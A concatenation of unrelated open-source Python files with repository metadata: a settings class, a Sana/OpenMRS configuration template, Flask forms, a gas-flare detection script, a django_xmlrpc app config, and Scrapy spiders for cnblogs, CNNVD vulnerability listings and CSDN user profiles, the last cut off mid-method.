# for now, we use cPickle to store settings.
import os
import sys
import cPickle
class AppSettings:
    """Holds app settings and can also load and save them.

    Settings are pickled into a dot-file named after the application in
    the user's home directory (e.g. ``~/.myapp``).
    """

    def __init__(self, app_name):
        """Initialize the AppSettings object with the app name. The settings
        are identified by it.  Immediately tries to load any saved settings.
        """
        self.app_name = app_name
        self.settings = {}
        self.loaded = False
        self.load()

    def _open_settings_file(self, mode):
        # Open ~/.<app_name> with the given mode ('rb' to read, 'wb' to write).
        settings_file_name = os.path.join(os.path.expanduser('~'), '.%s' %
                self.app_name)
        return open(settings_file_name, mode)

    def set(self, name, value):
        """Set a setting value. If the setting doesn't yet exist, it will be
        created."""
        self.settings[name] = value

    def has(self, name):
        """Return True if the named setting exists."""
        return name in self.settings

    def get(self, name):
        """Get a setting value. If the setting doesn't exist, None will be
        returned."""
        if name is None:  # fix: identity test instead of == None
            return None
        return self.settings.get(name)

    def list(self):
        """Return the names (keys) of the settings that exist."""
        return self.settings.keys()

    def remove(self, name):
        """Remove a setting. If the setting doesn't exist, nothing happens."""
        # pop with a default avoids the redundant membership test.
        self.settings.pop(name, None)

    def load(self):
        """Load the settings from the store; missing or unreadable files
        leave the defaults untouched (best-effort, as before)."""
        try:
            settings_file = self._open_settings_file('rb')
        except EnvironmentError:
            # No settings file yet -- keep the defaults.
            return
        try:
            loaded_settings = cPickle.load(settings_file)
        except Exception:
            # Corrupt or incompatible pickle: keep the defaults.
            # (Original used a bare `except: pass`; at least the file
            # handle is now always closed.)
            loaded_settings = None
        finally:
            settings_file.close()  # fix: was leaked when load() raised
        if loaded_settings is not None:
            self.settings = loaded_settings
            self.loaded = True

    def save(self):
        """Save the settings to the store."""
        settings_file = self._open_settings_file('wb')
        try:
            cPickle.dump(self.settings, settings_file)
        finally:
            settings_file.close()  # fix: close even if pickling fails
| {
"repo_name": "Abstrys/pyoculus",
"path": "abstrys/app_settings.py",
"copies": "1",
"size": "2282",
"license": "bsd-3-clause",
"hash": -5229093944531909000,
"line_mean": 31.1408450704,
"line_max": 78,
"alpha_frac": 0.5902716915,
"autogenerated": false,
"ratio": 4.17948717948718,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.016812200552227863,
"num_lines": 71
} |
"""App settings for Sana project.
This file contains the application configuration variables and should be
renamed to
local_settings.py
prior to filling in values. Once updated, enter the following from the mds
installation directory:
$> ./manage.py syncdb
This will require root privileges.
:Authors: Sana Development Team
:Version: 2.0
"""
API_VERSION = '2.0'
APICOMPAT_INCLUDE = ('v1',)
PATH_PREFIX = ""

# REST related settings
DEFAULT_LIMIT = 10
""" default number of objects per page """

# Field sets used when rendering objects at each representation level.
REST_REPS = {
    'default': ['uuid', 'uri'],
    'link': ['uuid', 'uri'],
    'full': ['uuid', 'uri']
}

# Per-object extra fields (currently none).
# Fix: 'observer' was listed twice; duplicate literal dict keys are
# silently collapsed, so the second entry just overwrote the first.
REST_OBJECT_REPS = {
    'concept': [],
    'device': [],
    'encounter': [],
    'notification': [],
    'observer': [],
    'requestlog': [],
    'subject': [],
}
### OpenMRS settings. OpenMRS versions seem to have some difference in submitted
### date format.
OPENMRS_VERSION = 1.9
"""Version of OpenMRS used as backend. Default is 1.9"""
OPENMRS_SERVER_URL = 'http://localhost/openmrs/'
"""Change localhost when deployed."""
OPENMRS_DATE_FMT = '%m/%d/%Y %H:%M'
"""For OpenMRS ver. 1.6. Set to %d/%m/%Y when using OpenMRS 1.7."""
OPENMRS_REPLYTO = ''
"""Reply address for notifications from OpenMRS."""
### Clickatell Settings
CLICKATELL_URI = 'http://api.clickatell.com/http/sendmsg?%s'
"""Example 'http://api.clickatell.com/http/sendmsg?%s'"""
CLICKATELL_USER = ''
"""A valid username."""
CLICKATELL_PASSWORD = ''
"""A valid password."""
CLICKATELL_API = ''
"""Refer to Clickatell documentation for this value."""
### Kannel Settings
KANNEL_URI = ''
"""URI Example: 'http://127.0.0.1:12121/cgi-bin/sendsms?%s'"""
KANNEL_USER = ''
"""A valid username."""
KANNEL_PASSWORD = ''
### ZniSMS Settings
ZNISMS_URL = ''
"""URI. Example: http://api.znisms.com/post/smsv3.asp?%s"""
ZNISMS_USER = ''
"""Consult ZniSMS documentation."""
ZNISMS_APIKEY = ''
"""Consult ZniSMS documentation."""
ZNISMS_SENDERID = ''
"""Consult ZniSMS documentation."""
### Email Configuration
EMAIL_HOST = ''
"""Outgoing mail server."""
EMAIL_HOST_USER = ''
"""Password for account used to send."""
EMAIL_HOST_PASSWORD = ''
"""Password for account used to send."""
EMAIL_PORT = '587'
"""Check with mail host, i.e. gmail uses 587, aws uses 25, 465, 587"""
EMAIL_USE_TLS = True
"""Check with mail host if encryption is supported"""
REVIEW_POST_TEMPLATE = "Data requiring review has been uploaded:\n\nDesktop: %s\n\nMobile: %s"
REVIEW_SUBJECT="Review required"
SMTP_REPLYTO = ""
REVIEW_ADDRESSES = []
CONVERT_MEDIA = False
"""Set to True to convert media; i.e. if you are uploading audio or video."""
FLUSH_SAVEDPROCEDURE = False
"""Set to True to flush text data on successful send."""
FLUSH_BINARYRESOURCE = False
"""Set to True to flush file data on successful send."""
FLUSH_NOTIFICATION = False
# Set to True to flush notification data on successful send."""
CONTENT_TYPES = (("text/plain", "Text"),
("image/jpg","Image"),
("audio/3gp","Audio"),
("video/3gp", "Video"),
("application/octet-stream", "Binary"))
# For the concept models
DATATYPES = ('string', 'number', 'boolean', 'complex')
MIMETYPES = (("text/plain", "Text"),
("image/jpg","Image"),
("audio/3gp","Audio"),
("video/3gp", "Video"),
("application/json", "JSON"),
("application/xml", "XML"),
("application/octet-stream", "Binary"))
EXTENSIONS = (("text/plain", ".txt"),
("image/jpg",".jpg"),
("audio/3gp",".3gp"),
("video/3gp", ".3gp"),
("application/json", ".json"),
("application/xml", ".xml"),
("application/octet-stream", ".bin"))
| {
"repo_name": "dekatzenel/team-k",
"path": "mds/local_settings.py",
"copies": "2",
"size": "3799",
"license": "bsd-3-clause",
"hash": -1738444109961600000,
"line_mean": 27.3507462687,
"line_max": 94,
"alpha_frac": 0.6112134772,
"autogenerated": false,
"ratio": 3.329535495179667,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9823439298936527,
"avg_score": 0.023461934688628058,
"num_lines": 134
} |
"""apps/forms.py: """
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, \
TextField, TextAreaField, HiddenField
from wtforms.validators import DataRequired, InputRequired
from wtforms.validators import ValidationError
def bad_chars(form, string_field):
    """Inline WTForms validator: reject `;`, `'` and backtick characters."""
    forbidden = ";'`"
    if any(ch in string_field.data for ch in forbidden):
        raise ValidationError('DONT TYPE DAT')
class ChatForm(FlaskForm):
    """Single-message chat input form for users to enter input."""
    message = StringField('message', validators=[DataRequired()])
    submit = SubmitField('Submit')
class UserForm(FlaskForm):
    """Form for creating/editing a user."""
    # bad_chars (defined in this module) rejects injection-prone characters.
    name = StringField(label='name',
                       id='user-name',
                       validators=[DataRequired(), bad_chars])
    submit = SubmitField(label='Submit')
class SentencePairForm(FlaskForm):
    """Form collecting an input sentence and a response sentence."""
    input_sentence = StringField(
        label='input-sentence',
        id='input-sentence',
        validators=[DataRequired()])
    response_sentence = StringField(
        label='response-sentence',
        id='response-sentence',
        validators=[DataRequired()])
    submit = SubmitField(label='Submit')
| {
"repo_name": "mckinziebrandon/DeepChatModels",
"path": "webpage/deepchat/main/forms.py",
"copies": "1",
"size": "1172",
"license": "mit",
"hash": -1041254498351788700,
"line_mean": 27.5853658537,
"line_max": 65,
"alpha_frac": 0.6672354949,
"autogenerated": false,
"ratio": 4.2773722627737225,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5444607757673723,
"avg_score": null,
"num_lines": null
} |
#!/apps/jasmin/jaspy/miniconda_envs/jaspy3.7/m3-4.6.14/envs/jaspy3.7-m3-4.6.14-r20200606/bin/python3
import os
import sys
import epr
import pandas as pd
import numpy as np
from src.ggf.detectors import ATXDetector, SLSDetector
import src.utils as utils
import src.config.filepaths as fp
def merge_hotspot_dataframes(atx_persistent_df, sls_persistent_df):
    """Merge ATX and SLS persistent-hotspot tables on arcmin grid cells.

    Each (lats_arcmin, lons_arcmin) cell is labelled 'atx' or 'sls' when
    only one instrument saw it, or 'both' when it appears in both frames.

    Fixes vs. the original:
    - ``DataFrame.append`` (removed in pandas 2.0) replaced by ``pd.concat``;
    - chained ``df.col.loc[...] = ...`` assignments (SettingWithCopyWarning;
      may silently fail to write) replaced by one ``Series.map``;
    - the input frames are no longer mutated (a 'sensor' column was
      previously added to them in place).
    """
    atx = atx_persistent_df.assign(sensor=1)
    sls = sls_persistent_df.assign(sensor=-1)
    combined = pd.concat([atx, sls], ignore_index=True, sort=False)
    hotspot_df = combined.groupby(['lats_arcmin', 'lons_arcmin'],
                                  as_index=False).agg({'sensor': np.sum})
    # 1 -> ATX only, -1 -> SLS only, 0 -> one row from each.
    # Assumes at most one row per grid cell in each input (as the
    # original logic did); any other sum maps to NaN.
    hotspot_df['sensor'] = hotspot_df['sensor'].map(
        {1: 'atx', -1: 'sls', 0: 'both'})
    return hotspot_df
def aggregate(df, aggregator):
    """Collapse df to one row per (grid_y, grid_x) cell using *aggregator*."""
    grouped = df.groupby(['grid_y', 'grid_x'], as_index=False)
    return grouped.agg(aggregator)
def main():
    """Detect gas-flare hotspots in one satellite granule and write CSVs.

    Command line: ``sys.argv[1]`` is the granule path, ``sys.argv[2]`` the
    sensor name; ``'sls'`` selects the SLSTR branch, anything else the
    ATSR-family ('atx') branch.  Two aggregated CSVs are written: one for
    flare detections, one for sampling (cloud-cover) statistics.
    """
    file_to_process = sys.argv[1]
    sensor = sys.argv[2]
    if sensor != 'sls':
        # ATSR-family granule: readable directly with the EPR API.
        product = epr.Product(file_to_process)
        HotspotDetector = ATXDetector(product)
        # Per-pixel fields retained for detected flares.
        flare_keys = ['latitude',
                      'longitude',
                      'local_cloudiness',
                      'swir_16',
                      'frp',
                      'pixel_size',
                      'mwir',
                      'background_mwir']
        # How each field is reduced when pixels are aggregated per grid cell.
        flare_aggregator = {'frp': np.sum,
                            'swir_16': np.mean,
                            'mwir': np.mean,
                            'background_mwir': np.mean,
                            'pixel_size': np.sum,
                            'latitude': np.mean,
                            'longitude': np.mean,
                            'local_cloudiness': np.mean,
                            'year': 'first',
                            'month': 'first',
                            'day': 'first',
                            'hhmm': 'first'}
        sampling_keys = ['latitude',
                         'longitude',
                         'local_cloudiness']
        sampling_aggregator = {'local_cloudiness': np.mean,
                               'year': 'first',
                               'month': 'first',
                               'day': 'first',
                               'hhmm': 'first'}
        # Persistent (known) flare locations from the ATS record.
        atx_persistent_fp = os.path.join(fp.output_l3,
                                         'all_sensors',
                                         'all_flare_locations_ats.csv')
        persistent_df = pd.read_csv(atx_persistent_fp)
    else:
        # SLSTR granule: product is zipped and must be extracted first.
        product = utils.extract_zip(file_to_process, fp.slstr_extract_temp)
        HotspotDetector = SLSDetector(product)
        # SLSTR has no MWIR channels here but two SWIR channels.
        flare_keys = ['latitude',
                      'longitude',
                      'local_cloudiness',
                      'swir_16',
                      'swir_22',
                      'frp',
                      'pixel_size']
        flare_aggregator = {'frp': np.sum,
                            'swir_16': np.mean,
                            'swir_22': np.mean,
                            'pixel_size': np.sum,
                            'latitude': np.mean,
                            'longitude': np.mean,
                            'local_cloudiness': np.mean,
                            'year': 'first',
                            'month': 'first',
                            'day': 'first',
                            'hhmm': 'first'}
        sampling_keys = ['latitude',
                         'longitude',
                         'local_cloudiness',
                         ]
        sampling_aggregator = {'local_cloudiness': np.mean,
                               'year': 'first',
                               'month': 'first',
                               'day': 'first',
                               'hhmm': 'first'
                               }
        # merge persistent dataframes for SLSTR
        atx_persistent_fp = os.path.join(fp.output_l3,
                                         'all_sensors',
                                         'all_flare_locations_atx.csv')
        atx_persistent_df = pd.read_csv(atx_persistent_fp)
        sls_persistent_fp = os.path.join(fp.output_l3,
                                         'all_sensors',
                                         'all_flare_locations_sls.csv')
        sls_persistent_df = pd.read_csv(sls_persistent_fp)
        persistent_df = merge_hotspot_dataframes(atx_persistent_df,
                                                 sls_persistent_df)
    # find persistent hotspots (i.e. flares)
    HotspotDetector.run_detector(flares_or_sampling=True)
    flare_df = HotspotDetector.to_dataframe(keys=flare_keys,
                                            joining_df=persistent_df)
    aggregated_flare_df = aggregate(flare_df, flare_aggregator)
    aggregated_flare_df.to_csv(utils.build_outpath(sensor, file_to_process, 'flares'))
    # get sampling associated with persistent hotspots
    sampling_df = HotspotDetector.to_dataframe(keys=sampling_keys,
                                               joining_df=persistent_df)
    aggregated_sampling_df = aggregate(sampling_df, sampling_aggregator)
    aggregated_sampling_df.to_csv(utils.build_outpath(sensor, file_to_process, 'samples'))


if __name__ == "__main__":
    main()
| {
"repo_name": "dabillox/kcl-globalgasflaring",
"path": "src/scripts/batch/flares.py",
"copies": "1",
"size": "5506",
"license": "mit",
"hash": -8415630570330784000,
"line_mean": 38.0496453901,
"line_max": 108,
"alpha_frac": 0.4673083908,
"autogenerated": false,
"ratio": 4.102831594634873,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5070139985434873,
"avg_score": null,
"num_lines": null
} |
"""apps module for the django_xmlrpc package
Authors::
Julien Fache
Credit must go to Brendan W. McAdams <brendan.mcadams@thewintergrp.com>, who
posted the original SimpleXMLRPCDispatcher to the Django wiki:
http://code.djangoproject.com/wiki/XML-RPC
New BSD License
===============
Copyright (c) 2007, Graham Binns http://launchpad.net/~codedragon
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the <ORGANIZATION> nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from django.apps import AppConfig
class XMLRPCConfig(AppConfig):
    """Django AppConfig for the django_xmlrpc application."""

    # Dotted path of the application package.
    name = 'django_xmlrpc'
    # Short label used to refer to the app (relations, migrations).
    label = 'xmlrpc'
    # Human-readable name shown e.g. in the admin.
    # NOTE(review): 'XMRPC' looks like a typo for 'XMLRPC' -- confirm
    # before changing, since it is user-visible.
    verbose_name = 'XMRPC'

    def ready(self):
        """Register all XML-RPC methods once the app registry is loaded."""
        # Local import: executed when ready() runs, not at module import.
        from django_xmlrpc.registry import register_xmlrpc_methods
        register_xmlrpc_methods()
| {
"repo_name": "Fantomas42/django-xmlrpc",
"path": "django_xmlrpc/apps.py",
"copies": "1",
"size": "2110",
"license": "bsd-3-clause",
"hash": 3734042660691816400,
"line_mean": 41.2,
"line_max": 79,
"alpha_frac": 0.771563981,
"autogenerated": false,
"ratio": 4.5085470085470085,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 50
} |
"""
@author: mazhicheng
@file: cnblogs_spider.py
@time: 2017/8/9 14:35
"""
from scrapy.selector import Selector
from scrapy.spiders import CrawlSpider, Rule
from scrapy.utils.response import get_base_url
from scrapy.linkextractors import LinkExtractor
from cnblogs.items import *
class CnblogsSpider(CrawlSpider):
    """Crawls the paginated blog-post listing of one cnblogs.com author
    and yields a CnblogsItem per post (title, link, listing URL, summary).

    NOTE: this module is Python 2 code (it uses the `print` statement).
    """

    # define crawler name
    name = 'CnblogsSpider'
    # limit crawler domain list, if not here: give up crawler other domain
    allowed_domains = ['cnblogs.com']
    # define crawler entrance
    start_urls = [
        'http://www.cnblogs.com/rwxwsblog/default.html?page=1'
    ]
    # define crawler URL rule and assign callback func is `parse_item`
    # (follows every numbered listing page of this author)
    rules = [
        Rule(LinkExtractor(allow=('/rwxwsblog/default.html\?page=\d{1,}')),
             follow=True,
             callback='parse_item')
    ]
    # Runs once, at class-definition (module import) time.
    print '-----CnblogsSpider-----'

    # define callback func
    # use Xpath or CSS Selector
    def parse_item(self, response):
        """Extract one item per post shown on a listing page."""
        items = []
        sel = Selector(response)
        base_url = get_base_url(response)
        # One node per post title / per post summary on the page.
        postTitle = sel.css('div.day div.postTitle')
        postCon = sel.css('div.postCon div.c_b_p_desc')
        for index in range(len(postTitle)):
            item = CnblogsItem()
            item['title'] = postTitle[index].css('a').xpath('text()').extract()[0]
            item['link'] = postTitle[index].css('a').xpath('@href').extract()[0]
            item['list_url'] = base_url
            try:
                item['desc'] = postCon[index].xpath('text()').extract()[0]
            except Exception as e:
                # Posts without a summary fall back to a placeholder.
                item['desc'] = 'not desc'
            items.append(item)
        return items
| {
"repo_name": "mazcheng/snippets",
"path": "spider/cnblogs/cnblogs/spiders/cnblogs_spider.py",
"copies": "2",
"size": "1517",
"license": "apache-2.0",
"hash": 1955075751307937000,
"line_mean": 28.1730769231,
"line_max": 73,
"alpha_frac": 0.686882004,
"autogenerated": false,
"ratio": 2.9117082533589254,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9394781736201336,
"avg_score": 0.04076170423151784,
"num_lines": 52
} |
"""
@author: mazhicheng
@file: cnnvd_spider.py
@time: 2017/8/16 18:21
"""
import re
import logging
from scrapy.selector import Selector
from scrapy.spiders import CrawlSpider, Rule
from scrapy.utils.response import get_base_url
from scrapy.linkextractors import LinkExtractor
from scrapy import Request
from cnnvd.items import *
# from cnnvd.settings import LOG_CONF
# logging.config.fileConfig(LOG_CONF)
class CnnvdSpider(CrawlSpider):
    """Crawls cnnvd.org.cn, yielding vulnerability and patch items.

    List pages are paginated manually (see PAGE_NO) in addition to the
    CrawlSpider rules; detail pages are parsed into CnnvdVulnItem /
    CnnvdPatchItem.
    """

    name = 'CnnvdSpider'
    allowed_domains = ['cnnvd.org.cn']
    # Entry points: one vulnerability list page, one patch list page.
    start_urls = [
        'http://www.cnnvd.org.cn/web/vulnerability/querylist.tag?pageno=1099',
        'http://www.cnnvd.org.cn/web/cnnvdpatch/querylist.tag?pageno=1494',
    ]
    rules = [
        # Vulnerability list pages
        Rule(LinkExtractor(allow=(r'/web/vulnerability/querylist\.tag', ), deny=('qstartdateXq', 'relLdKey',
                                                                                 'cvCnnvdUpdatedateXq', 'cpvendor')),
             follow=True,
             callback='parse_vuln'),
        # Patch list pages
        Rule(LinkExtractor(allow=(r'/web/cnnvdpatch/querylist\.tag', ), ),
             follow=True,
             callback='parse_patch'),
        # Vulnerability detail pages
        Rule(LinkExtractor(allow=(r'/web/xxk/ldxqById\.tag', ), deny=('qstartdateXq', 'relLdKey',
                                                                      'cvCnnvdUpdatedateXq', 'cpvendor')),
             follow=True,
             callback='parse_vuln_item'),
        # Patch detail pages
        Rule(LinkExtractor(allow=(r'/web/xxk/bdxqById\.tag', ), ),
             follow=True,
             callback='parse_patch_item'),
    ]
    host = 'http://www.cnnvd.org.cn'
    # Splits a list URL into (prefix, page number) for manual pagination.
    PAGE_NO = re.compile(r'(.*?pageno=)(\d+)')
    # Extracts CNNVD vulnerability ids from detail-page hrefs.
    VULN_ID = re.compile(r'.*?=(CNNVD-\d+-\d+)')

    def parse_vuln(self, response):
        """Handle a vulnerability list page: queue detail pages + next page."""
        logging.critical(response.url)
        vuln_selector = Selector(response)
        vuln_href = vuln_selector.xpath("//a[@class='a_title2']/@href")
        for href in vuln_href.extract():
            abs_url = self.host + href
            yield Request(abs_url, callback=self.parse_vuln_item)
        try:
            # Manually request the next list page (pageno + 1).
            if 'pageno' in response.url:
                comm_url, page_no = self.PAGE_NO.search(response.url).groups()
                abs_url = comm_url + str(int(page_no)+1)
            else:
                abs_url = self.host + '/web/vulnerability/querylist.tag?pageno=2'
            yield Request(abs_url, callback=self.parse_vuln)
        except Exception as e:
            logging.error('parse_vuln URL[%s] ERR[%s]' % (response.url, e))

    def parse_patch(self, response):
        """Handle a patch list page: queue detail pages + next page."""
        logging.critical(response.url)
        patch_selector = Selector(response)
        patch_href = patch_selector.xpath("//a[@class='a_title2']/@href")
        for href in patch_href.extract():
            abs_url = self.host + href
            yield Request(abs_url, callback=self.parse_patch_item)
        try:
            # Manually request the next list page (pageno + 1).
            if 'pageno' in response.url:
                comm_url, page_no = self.PAGE_NO.search(response.url).groups()
                abs_url = comm_url + str(int(page_no) + 1)
            else:
                abs_url = self.host + '/web/cnnvdpatch/querylist.tag?pageno=2'
            yield Request(abs_url, callback=self.parse_patch)
        except Exception as e:
            logging.error('parse_vuln URL[%s] ERR[%s]' % (response.url, e))

    def parse_vuln_item(self, response):
        """Scrape one vulnerability detail page into a CnnvdVulnItem."""
        logging.critical(response.url)
        vuln_item_selector = Selector(response)
        vuln_detail = vuln_item_selector.xpath("//div[contains(@class, 'detail_xq') and contains(@class, 'w770')]")
        # NOTE(review): the variable below is assigned but never used.
        vuln_notice_refer_entry_patch = vuln_item_selector.xpath("//div[contains(@class, 'd_ldjj') and contains(@class, 'm_t_20')]")
        vuln_item = CnnvdVulnItem()
        vuln_item['vuln_id'] = self._clean_extract_first(vuln_detail, 'ul/li[1]/span/text()')
        vuln_item['name'] = self._clean_extract_first(vuln_detail, 'h2/text()')
        vuln_item['harm_level'] = self._clean_extract_first(vuln_detail, 'ul/li[2]/a/text()')
        vuln_item['cve_id'] = self._clean_extract_first(vuln_detail, 'ul/li[3]/a/text()')
        vuln_item['vuln_type'] = self._clean_extract_first(vuln_detail, 'ul/li[4]/a/text()')
        vuln_item['report_time'] = self._clean_extract_first(vuln_detail, 'ul/li[5]/a/text()')
        vuln_item['threat_type'] = self._clean_extract_first(vuln_detail, 'ul/li[6]/a/text()')
        vuln_item['update_time'] = self._clean_extract_first(vuln_detail, 'ul/li[7]/a/text()')
        vuln_item['company'] = self._clean_extract_first(vuln_detail, 'ul/li[8]/a/text()')
        vuln_item['vuln_source'] = self._clean_extract_first(vuln_detail, 'ul/li[9]/a/text()')
        # Each long-text field concatenates plain text plus anchor text.
        vuln_item['vuln_abstract'] = self._merge_clean_extract(vuln_item_selector, "//div[@class='d_ldjj']/p/text()")
        vuln_item['vuln_abstract'] += self._merge_clean_extract(vuln_item_selector, "//div[@class='d_ldjj']/p/a/text()")
        vuln_item['vuln_notice'] = self._merge_clean_extract(vuln_item_selector,
                                                             '/html/body/div[4]/div/div[1]/div[4]/p/text()')
        vuln_item['vuln_notice'] += self._merge_clean_extract(vuln_item_selector,
                                                              '/html/body/div[4]/div/div[1]/div[4]/p/a/text()')
        vuln_item['refer_site'] = self._merge_clean_extract(vuln_item_selector,
                                                            '/html/body/div[4]/div/div[1]/div[5]/p/text()')
        vuln_item['refer_site'] += self._merge_clean_extract(vuln_item_selector,
                                                             '/html/body/div[4]/div/div[1]/div[5]/p/a/text()')
        vuln_item['affect_entry'] = self._merge_clean_extract(vuln_item_selector,
                                                              '/html/body/div[4]/div/div[1]/div[6]/p/text()')
        vuln_item['affect_entry'] += self._merge_clean_extract(vuln_item_selector,
                                                               '/html/body/div[4]/div/div[1]/div[6]/p/a/text()')
        vuln_item['patch'] = self._merge_clean_extract(vuln_item_selector,
                                                       '/html/body/div[4]/div/div[1]/div[7]/p/text()')
        vuln_item['patch'] += self._merge_clean_extract(vuln_item_selector,
                                                        '/html/body/div[4]/div/div[1]/div[7]/p/a/text()')
        yield vuln_item

    def parse_patch_item(self, response):
        """Scrape one patch detail page into a CnnvdPatchItem."""
        logging.critical(response.url)
        patch_item_selector = Selector(response)
        patch_detail = patch_item_selector.xpath("//div[contains(@class, 'detail_xq') and contains(@class, 'w770')]")
        patch_item = CnnvdPatchItem()
        patch_item['patch_id'] = self._clean_extract_first(patch_detail, 'ul/li[1]/text()')
        patch_item['name'] = self._clean_extract_first(patch_detail, 'h2/text()')
        patch_item['size'] = self._clean_extract_first(patch_detail, 'ul/li[2]/text()')
        patch_item['important_level'] = self._clean_extract_first(patch_detail, 'ul/li[3]/text()')
        patch_item['report_time'] = self._clean_extract_first(patch_detail, 'ul/li[4]/text()')
        patch_item['company'] = self._clean_extract_first(patch_detail, 'ul/li[5]/text()')
        patch_item['company_homepage'] = self._clean_extract_first(patch_detail, 'ul/li[6]/a/text()')
        patch_item['md5_val'] = self._clean_extract_first(patch_detail, 'ul/li[7]/text()')
        patch_item['refer_site'] = self._merge_clean_extract(patch_item_selector, "//div[@class='d_ldjj']/p/text()")
        patch_item['refer_site'] += self._merge_clean_extract(patch_item_selector, "//div[@class='d_ldjj']/p/a/text()")
        # Collect linked vulnerability ids (CNNVD-YYYY-NNNN) for this patch.
        patch_item['vuln'] = self._merge_clean_extract(patch_item_selector, "//a[@class='a_title2']/@href", ', ')
        patch_item['vuln'] = self.VULN_ID.findall(patch_item['vuln'])
        yield patch_item

    def _clean_extract_first(self, selector, xpath_path, default_str=''):
        """Extract the first xpath match, stripped; '' on any failure."""
        try:
            extract_first_result = selector.xpath(xpath_path).extract_first(default_str)
            return extract_first_result.strip()
        except Exception as e:
            return ''

    def _merge_clean_extract(self, selector, xpath_path, join_str=''):
        """Extract all xpath matches, strip each, join with *join_str*."""
        try:
            clean_extract_result = map(lambda x: x.strip(), selector.xpath(xpath_path).extract())
            return join_str.join(clean_extract_result)
        except Exception as e:
            return '' | {
"repo_name": "mazcheng/snippets",
"path": "spider/cnnvd/cnnvd/spiders/cnnvd_spider.py",
"copies": "1",
"size": "7357",
"license": "apache-2.0",
"hash": -7421649497902887000,
"line_mean": 44.4534161491,
"line_max": 126,
"alpha_frac": 0.6647533142,
"autogenerated": false,
"ratio": 2.5882561018747787,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.37530094160747784,
"avg_score": null,
"num_lines": null
} |
"""
@author: mazhicheng
@file: csdn_spider.py
@time: 2017/8/10 11:14
"""
import json
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.utils.response import get_base_url
from scrapy.linkextractors import LinkExtractor
from scrapy import Request, FormRequest
from csdn.items import *
class CsdnSpider(CrawlSpider):
    """Logs into CSDN and scrapes profile data for followed accounts.

    Flow: login -> list followed users -> per user, chain through the
    my.csdn.net JSON services (score, fields, skill, education, work,
    contact), accumulating one CsdnPeopleItem per user.
    """

    name = 'CsdnSpider'
    allowed_domains = [
        'passport.csdn.net',
        'csdn.net',
        'my.csdn.net'
    ]
    # Login credentials -- 'XXX' are placeholders; fill in before running.
    formdata = {
        'username': 'XXX',
        'password': 'XXX'
    }
    start_urls = [
        'http://www.csdn.net/',
        'http://passport.csdn.net/account/login',
        'http://my.csdn.net/'
    ]
    followers = set()
    rules = [
        Rule(LinkExtractor(allow=('csdn\.net')),
             follow=True),
    ]

    def start_requests(self):
        """Start at the login page instead of start_urls."""
        return [Request('https://passport.csdn.net/account/login', callback=self.parse_login)]

    def parse_login(self, response):
        """Submit the login form with the configured credentials."""
        return [FormRequest.from_response(response, formdata=self.formdata, callback=self.after_login)]

    def after_login(self, response):
        """Fetch the first two pages (50 each) of followed accounts."""
        return [
            Request('http://my.csdn.net/service/main/my_relation?pageno=1&pagesize=50&type=follow',
                    callback=self.parse_attention),
            Request('http://my.csdn.net/service/main/my_relation?pageno=2&pagesize=50&type=follow',
                    callback=self.parse_attention),
        ]

    def parse_attention(self, response):
        """Request the profile home page of every followed account."""
        raw_followers = response.body
        for user_info in json.loads(raw_followers)['result']['list']:
            homepage = 'http://my.csdn.net/' + user_info[u'username']
            yield Request(homepage, callback=self.parse_person)

    def parse_person(self, response):
        """Scrape name/avatar/follow counts, then chain to the score service."""
        sel = Selector(response)
        base_url = get_base_url(response)
        person_info_con = sel.css('div.persional_property div.person_info_con')
        person_photo = person_info_con.css('dl.person-photo')
        person_info = person_info_con.css('dl.person-info')
        # NOTE(review): person_detail is assigned but never used.
        person_detail = sel.css('div.persion_section div#divDetail.aboutMe div.myDetails.activeContent')
        item = CsdnPeopleItem()
        item['name'] = person_info.xpath('dt/span/text()').extract_first()
        item['homepage'] = base_url
        item['avatar_url'] = person_photo.xpath('dt/a/img/@src').extract_first()
        item['focus_num'] = person_photo.xpath('dd[1]/b/text()').extract_first()
        item['fans_num'] = person_photo.xpath('dd[2]/b/text()').extract_first()
        # visited
        # http://my.csdn.net/service/main/visited?username=feng88724
        yield Request('http://my.csdn.net/service/main/getSorce?username=' + item['name'],
                      meta={'item': item}, callback=self.parse_score)

    def parse_score(self, response):
        """Attach per-category score levels, then chain to the fields service."""
        item = response.meta['item']
        score = json.loads(response.body)['result']['score']
        item['score'] = {k: v.get('level', 'null') for k, v in score.items()}
        yield Request('http://my.csdn.net/service/main/get_knownarea_list?username=' + item['name'],
                      meta={'item': item}, callback=self.parse_field)

    def parse_field(self, response):
        """Attach the user's declared expertise areas, then chain to skills."""
        item = response.meta['item']
